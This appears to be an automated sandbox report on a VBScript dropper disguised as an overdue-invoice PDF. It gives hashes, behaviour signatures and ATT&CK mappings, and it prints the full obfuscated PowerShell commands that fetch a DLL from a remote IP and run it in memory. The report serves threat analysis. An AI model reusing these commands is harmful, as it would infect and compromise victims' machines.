80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff

General

Target

DETALLES FACTUTACION VENCIDA.PDF.vbs
Size

208KB
MD5

c2a54f061aba21192c2366e5aff19ef3
SHA1

0e35261883e5bbe9df33797d230f7180309b083e
SHA256

80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff
SHA512

59ebcecb57800046d977e2fdd733d29e41d3ca14feab25b730ceeee8e6f4fa5e40e72eff2c3a629c8d9af298dbad1e18c1a34d87cef76e908f754f3221b558db

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1632 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1976 powershell.exe
1632 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1976 powershell.exe
Token: SeDebugPrivilege 1632 powershell.exe

flow	pid	process
3	1632	powershell.exe

pid	process
1976	powershell.exe
1632	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1228 wrote to memory of 1976	1228	WScript.exe	powershell.exe
PID 1228 wrote to memory of 1976	1228	WScript.exe	powershell.exe
PID 1228 wrote to memory of 1976	1228	WScript.exe	powershell.exe
PID 1976 wrote to memory of 1632	1976	powershell.exe	powershell.exe
PID 1976 wrote to memory of 1632	1976	powershell.exe	powershell.exe
PID 1976 wrote to memory of 1632	1976	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA⚔⚔⚔wB0AGEAcgB0AH⚔⚔⚔AcABSAG8AZABhAC⚔⚔⚔AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG⚔⚔⚔AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMwAuADEAMAA2AC4AMQA5ADEALgAxADAANQAvAGQAbABsAC8AZABsAGwAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQALgB0AHgAdAAnACkAKQA7AFsA⚔⚔⚔wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⚔⚔⚔AcgByAG⚔⚔⚔AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⚔⚔⚔AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⚔⚔⚔ARwBsAHkAbQB6AF⚔⚔⚔AZwAnACkALgBHAG⚔⚔⚔AdABNAG⚔⚔⚔AdABoAG8AZAAoACcAVQBEAHMA⚔⚔⚔wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⚔⚔⚔AbABsACwAIABbAG8AYgBqAG⚔⚔⚔AYwB0AFsAXQBdACAAKAAnADEAMAAzADAAMAA5ADAAZgA0AGMANAA4AC0AYwAzADIAOAAtADEAMQAxADQALQA3ADEAYQA3AC0AYwA0ADYANgAxAGYAOAA0AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuAE8AVABYAE⚔⚔⚔AVAAvAG8ALwBtAG8AYwAuAHQAbwBwAHMAcABwAGEALgB0AG4AZQBwAG4AaQB0AHMAZQB0AC8AYgAvADAAdgAvAG0AbwBjAC4AcwBpAHAAYQBlAGwAZwBvAG8AZwAuAG⚔⚔⚔AZwBhAHIAbwB0AHMAZQBzAGEAYgBlAHIAaQBmAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⚔⚔⚔gBvAGQAYQBDAG8AcAB5ACAALAAgACcAbgBvAHQAZQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('⚔⚔⚔','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('1030090f4c48-c328-1114-71a7-c4661f84=nekot&aidem=tla?txt.OTXET/o/moc.topsppa.tnepnitset/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'note' ))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
f12f97f3591dc41abb731cf8f3ca52dd

SHA1
758f2c56039a64d2896d3eb3578fe02a2dc8ae93

SHA256
43b69e288b5309cd37216bc5036d065ad7f0725067b937899d409e0527aa263a

SHA512
6d5dff4feb63379069abdd12c62973fa3da02986fa9c0b8354a2e4f9b2d3480d421720b7e85ccfd8f0b2afdbfb56843d4703e96576705d1776f24509bfe97f4f

Download Submit
memory/1228-54-0x000007FEFB871000-0x000007FEFB873000-memory.dmp

Filesize
8KB

Download
memory/1632-68-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1632-65-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmp

Filesize
11.4MB

Download
memory/1632-71-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/1632-70-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1632-61-0x0000000000000000-mapping.dmp

Download
memory/1632-69-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/1632-64-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmp

Filesize
10.1MB

Download
memory/1632-67-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1976-66-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1976-58-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmp

Filesize
11.4MB

Download
memory/1976-55-0x0000000000000000-mapping.dmp

Download
memory/1976-57-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmp

Filesize
10.1MB

Download
memory/1976-60-0x000000001B880000-0x000000001BB7F000-memory.dmp

Filesize
3.0MB

Download
memory/1976-59-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1976-72-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1976-73-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing